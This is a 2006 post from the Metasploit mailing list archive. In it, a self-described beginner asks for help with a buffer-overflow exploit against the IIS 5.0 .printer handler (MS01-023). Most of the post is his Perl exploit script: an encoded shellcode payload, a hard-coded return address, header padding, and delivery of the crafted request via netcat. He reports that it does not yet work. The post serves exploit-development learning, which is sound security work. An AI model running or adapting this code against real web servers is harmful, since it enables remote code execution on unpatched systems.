Metasploit mailing list archives
iis50_printer_overflow
From: sonixxfx at gmail.com (Sonixxfx)
Date: Thu, 2 Mar 2006 21:49:11 +0100
Hi, I am trying to write an exploit for the "iis50_printer_overflow" vulnerability (http://www.osvdb.org/3323 http://www.microsoft.com/technet/security/bulletin/MS01-023.mspx http://seclists.org/lists/bugtraq/2001/May/0005.html http://milw0rm.com/metasploit.php?id=27), but I run into a problem. It is the first time I am doing this and I cannot write in C. I have read the exellent part Vinnie Liu wrote about writing exploits, but I cannot find enough info in it to solve my problem. The problem seems to be that I have few space available after the return address for the payload. I believe there is something about 240 bytes available. So my question is how can I make use of both the space available after the return address but also before the return address? There are 268 bytes available before the return address. I have made use of a "call esp" opcode because I saw my attack string in esp in ollydbg. I saw an exploit online that makes use of the same vulnerability but it seem to be using a "call ebx" opcode, so I used a "call ebx" opcode too but also without result. Below is the perl script that I have written. I have determined bad characters, and decoded etc, but when I try this with ollydbg nothing seems to change in olly and inetinfo keeps running. Please keep in mind that I am a n00b on this subject. This is my perl program: $payload = "\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". "\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". "\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". "\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". "\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". "\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff". "\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56". "\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58". "\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44". "\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d". "\x4e\x4f\x4a\x4e\x46\x34\x42\x50\x42\x50\x42\x50\x4b\x38\x45\x44". "\x4e\x33\x4b\x38\x4e\x37\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48". "\x4f\x44\x4a\x51\x4b\x48\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x54". "\x4b\x58\x46\x53\x4b\x38\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39". "\x4e\x4a\x46\x58\x42\x4c\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30". "\x41\x50\x44\x4c\x4b\x4e\x46\x4f\x4b\x43\x46\x55\x46\x42\x46\x50". "\x45\x57\x45\x4e\x4b\x38\x4f\x35\x46\x52\x41\x50\x4b\x4e\x48\x46". "\x4b\x38\x4e\x50\x4b\x34\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e". "\x4b\x58\x4e\x41\x4b\x38\x41\x50\x4b\x4e\x49\x58\x4e\x45\x46\x42". "\x46\x50\x43\x4c\x41\x43\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x53". "\x45\x38\x42\x4c\x4a\x47\x4e\x50\x4b\x58\x42\x54\x4e\x30\x4b\x58". "\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x4a\x56\x4a\x50\x4b\x4e\x49\x50". "\x4b\x38\x42\x58\x42\x4b\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36". "\x4e\x33\x4f\x45\x41\x33\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f". "\x43\x58\x42\x4c\x4b\x37\x42\x45\x4a\x56\x42\x4f\x4c\x38\x46\x50". "\x4f\x55\x4a\x36\x4a\x49\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f". "\x47\x4e\x49\x36\x42\x37\x43\x36\x4f\x56\x50\x56\x48\x36\x49\x36". "\x47\x46\x42\x30\x5a"; $string = "GET /"; $string .= "NULL.printer HTTP/1.0\r\n"; $string .= "Host: "; $string .= "A" x 268; $string .= "\xf3\x45\x2c\x73"; $string .= $payload; $string .= "\r\n\r\n"; open (NC, "|nc.exe 127.0.0.1 80"); print NC $string; close(NC); I hope I have included enough information. I am a bit tired at the moment. B.t.w. Nice looking man this morning on your website Metasploit ;) Thanks Regards, Ben -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060302/1376b01b/attachment.htm>
Current thread:
- iis50_printer_overflow Sonixxfx (Mar 02)
- iis50_printer_overflow H D Moore (Mar 02)
- iis50_printer_overflow Sonixxfx (Mar 03)
- iis50_printer_overflow Sonixxfx (Mar 03)
- iis50_printer_overflow Dave Killion (Mar 04)
- iis50_printer_overflow zodiac (Mar 04)
- iis50_printer_overflow Sonixxfx (Mar 07)
- iis50_printer_overflow H D Moore (Mar 07)
- iis50_printer_overflow Michael Boman (Mar 08)
- iis50_printer_overflow Peter Lee (Mar 08)
- iis50_printer_overflow pagvac (Mar 09)
- iis50_printer_overflow Sonixxfx (Mar 03)
- iis50_printer_overflow H D Moore (Mar 02)